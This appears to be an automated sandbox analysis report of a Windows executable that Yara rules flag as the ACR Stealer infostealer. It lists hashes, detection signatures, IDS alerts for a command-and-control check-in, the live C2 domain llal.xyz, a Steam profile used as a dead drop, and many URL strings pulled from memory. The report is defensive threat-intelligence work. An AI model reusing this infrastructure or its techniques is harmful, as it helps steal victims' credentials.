
Windows Analysis Report
OXoeX1Ii3x.exe

Overview

General Information

Sample name: OXoeX1Ii3x.exe (renamed because the original name is a hash value)
Original sample name: 3e9881b9c6ff4994fc9d684456694e77.exe
Analysis ID: 1582973
MD5: 3e9881b9c6ff4994fc9d684456694e77
SHA1: 370244669daea5f87c797d6ad240adbfb7006384
SHA256: a35599ceb0a707d21515a6813b699a86ef0bef98fb42b804274640df2cef4879
Tags: exe, user-abuse_ch

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • OXoeX1Ii3x.exe (PID: 7504 cmdline: "C:\Users\user\Desktop\OXoeX1Ii3x.exe" MD5: 3E9881B9C6FF4994FC9D684456694E77)
    • WerFault.exe (PID: 7652 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7504 -s 2016 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Yara matches (Source / Rule / Description / Author / Strings):

Source: OXoeX1Ii3x.exe
Rule: infostealer_win_acrstealer_str
Description: Finds ACR Stealer standalone samples based on specific strings.
Author: Sekoia.io
Strings:
  • 0x4f710:$str01: ref.txt
  • 0x4e348:$str02: Wininet.dll
  • 0x4e3c4:$str03: Content-Type: application/octet-stream; boundary=----
  • 0x4e40c:$str04: POST
  • 0x4e484:$str05: os_c
  • 0x4e48c:$str06: en_k
  • 0x4f734:$str07: MyApp/1.0
  • 0x4e5c4:$str08: /Up/b
  • 0x50018:$str10: /ujs/
  • 0x5006c:$str11: /Up/
  • 0x50040:$str12: ostr
  • 0x50048:$str13: brCH
  • 0x50050:$str14: brGk
  • 0x4e43c:$str15: https://steamcommunity.com/profiles/
Yara matches in unpacked memory (Source / Rule / Description / Author / Strings):

Source: 0.0.OXoeX1Ii3x.exe.140000.0.unpack
Rule: infostealer_win_acrstealer_str
Description: Finds ACR Stealer standalone samples based on specific strings.
Author: Sekoia.io
Strings:
  • 0x4f710:$str01: ref.txt
  • 0x4e348:$str02: Wininet.dll
  • 0x4e3c4:$str03: Content-Type: application/octet-stream; boundary=----
  • 0x4e40c:$str04: POST
  • 0x4e484:$str05: os_c
  • 0x4e48c:$str06: en_k
  • 0x4f734:$str07: MyApp/1.0
  • 0x4e5c4:$str08: /Up/b
  • 0x50018:$str10: /ujs/
  • 0x5006c:$str11: /Up/
  • 0x50040:$str12: ostr
  • 0x50048:$str13: brCH
  • 0x50050:$str14: brGk
  • 0x4e43c:$str15: https://steamcommunity.com/profiles/
Source: 0.2.OXoeX1Ii3x.exe.140000.0.unpack
Rule: infostealer_win_acrstealer_str
Description: Finds ACR Stealer standalone samples based on specific strings.
Author: Sekoia.io
Strings:
  • 0x4f710:$str01: ref.txt
  • 0x4e348:$str02: Wininet.dll
  • 0x4e3c4:$str03: Content-Type: application/octet-stream; boundary=----
  • 0x4e40c:$str04: POST
  • 0x4e484:$str05: os_c
  • 0x4e48c:$str06: en_k
  • 0x4f734:$str07: MyApp/1.0
  • 0x4e5c4:$str08: /Up/b
  • 0x50018:$str10: /ujs/
  • 0x5006c:$str11: /Up/
  • 0x50040:$str12: ostr
  • 0x50048:$str13: brCH
  • 0x50050:$str14: brGk
  • 0x4e43c:$str15: https://steamcommunity.com/profiles/
No Sigma rule has matched
Suricata IDS alerts (severity 1):

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-01T09:06:59.267860+0100 | 2052674 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 188.114.97.3 | 443 | TCP

Suricata IDS alerts (low severity):

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-01T09:06:58.180719+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | TCP
2025-01-01T09:06:59.267860+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 188.114.97.3 | 443 | TCP


AV Detection

Source: OXoeX1Ii3x.exe | Avira: detected
Source: OXoeX1Ii3x.exe | Virustotal: Detection: 52%
Source: OXoeX1Ii3x.exe | ReversingLabs: Detection: 68%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: OXoeX1Ii3x.exe | Joe Sandbox ML: detected
Source: OXoeX1Ii3x.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: OXoeX1Ii3x.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_00147A82 __EH_prolog3_GS,FindFirstFileA,PathMatchSpecA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,FindClose,FindClose,0_2_00147A82

Networking

Source: Network traffic | Suricata IDS: 2052674 - Severity 1 - ET MALWARE ACR Stealer CnC Checkin Attempt : 192.168.2.4:49731 -> 188.114.97.3:443
Source: DNS query: llal.xyz
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | IP Address: 104.102.49.254
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49730 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49731 -> 188.114.97.3:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199619938930 HTTP/1.1 User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603 Host: steamcommunity.com Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d HTTP/1.1 User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603 Host: llal.xyz Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_001573CD InternetOpenUrlA,InternetReadFile,0_2_001573CD
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: onnect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: llal.xyz
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682119129.000000000301E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.3.dr | String found in binary or memory: http://upx.sf.net
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
Source: 76561199619938930[1].htm.0.dr | String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
Source: OXoeX1Ii3x.exe, 00000000.00000002.1870057539.0000000002CFC000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://community.fa4
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
